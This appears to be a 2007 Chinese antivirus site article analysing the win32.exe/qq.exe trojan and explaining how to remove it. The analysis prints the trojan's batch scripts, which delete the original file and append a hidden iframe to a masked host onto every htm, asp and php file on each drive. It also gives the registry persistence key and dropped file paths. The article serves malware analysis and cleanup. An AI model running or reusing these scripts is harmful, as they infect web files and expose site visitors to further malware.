win32.exe qq.exe木马的解决方案

您现在的位置：猫头鹰病毒资讯网 >> 病毒防治 >> 病毒防治 >> 文章正文

作者：海色の月文章来源：C.I.S.R.T 点击数：更新时间：2007-9-11

金山联盟百度打造中国互联网

国内知名的信息网络安全厂商金山联手全球最大的中文搜索引擎百度共同推出一款基于WEB的零客户端（网页方式）的安全解决方案——“百度……

金山联盟百度打造中国互联网第一免费杀毒平台

Nod32获得Avc本年度最佳反病毒产品殊荣

常见手机病毒分析

PPLive携手ESET NOD32发布免费版杀毒防毒软件

卡巴斯基7.0简体中文版上市

　　病毒分析：

　　木马运行后复制副本到系统目录和IE临时目录：
　　%System%\win32.exe
　　%ietemp%\qq.exe

　　创建启动项：

　　[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"qq"="%System%\win32.exe"

　　在当前目录生成批处理kill.bat删除自身原文件：

以下是引用片段：
:redel
del "{原文件}"
if exist "{原文件}" goto redel
del %0
在IE临时目录生成批处理1.bat：
[Copy to clipboard] [ - ]CODE:
@echo off
for %%a in ({各分区}) do (
if exist %%a:\nul (
for /f "tokens=*" %%b in ('dir /s/b/a-d %%a:\*.htm') do (echo ^<iframe src="http://www.****.com" width=0 height=0 border=0^>^</iframe^>>> "%%b")))
@echo off
for %%a in ({各分区}) do (
if exist %%a:\nul (
for /f "tokens=*" %%b in ('dir /s/b/a-d %%a:\*.asp') do (echo ^<iframe src=http://www.****.com width=0 height=0 border=0^>^</iframe^>>> "%%b")))
@echo off
for %%a in ({各分区}) do (
if exist %%a:\nul (
for /f "tokens=*" %%b in ('dir /s/b/a-d %%a:\*.php') do (echo ^<iframe src=http://www.****.com width=0 height=0 border=0^>^</iframe^>>> "%%b")))

　　往各分区下所有htm*、asp*、php*文件的末尾添加恶意代码：

　　<iframe src="http://www.****.com" width=0 height=0 border=0></iframe>
访问网络下载其它病毒、木马或恶意程序到%UserProfile%\Local Settings目录下并运行，文件名为Temporary Internet Files加数字。

　　查杀清除方法：　

　　下载sreng2.zip和IceSword120_cn.zip(以下简称冰刃)

　　SReng2:http://www.motoyi.com/Down/Noted/200705/Down_28.shtml

　　IceSword120:http://www.motoyi.com/Down/Noted/200704/Down_10.shtml

　　1. 删除木马创建的启动项（打开冰刃－注册表－依次找到病毒注册表选项删除即可）：

　　[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"qq"="%System%\win32.exe"

　　2. 删除木马相关文件（详细步骤：打开冰刃－文件－依次找到病毒文件删除即可）：
　　%System%\win32.exe
　　%ietemp%\qq.exe
　　%ietemp%\1.bat
　　%UserProfile%\Local Settings\Temporary Internet Files{数字}.exe
　　%Windows%\1.ini

　　3. 使用工具清除htm*、asp*、php*文件末尾被添加的恶意代码(建议使用360安全卫士进行其它清理)

　　360安全卫士下载：http://down.360safe.com/setup.exe

文章录入：菜猫责任编辑：菜猫

上一篇文章：访问google提示“Google退出中国,请用百度进行搜索”的解决方法

下一篇文章： Virus.Win32.AutoRun.ev（,.exe）病毒查杀清除方法

热点文章

梦中情人病毒snow.exe,s…

图解清除不知名自启动病…

盗Q的病毒(Virus.Win32.…

LYLOADER.EXE LYMANGR.D…

auto.exe(Worm.Win32.Ag…

木马下载器 wmids.exe 解…

Trojan.PSW.Win32.Agent…

七位随机字母病毒清除方…

hidden object病毒查杀

Messenger木马查杀方法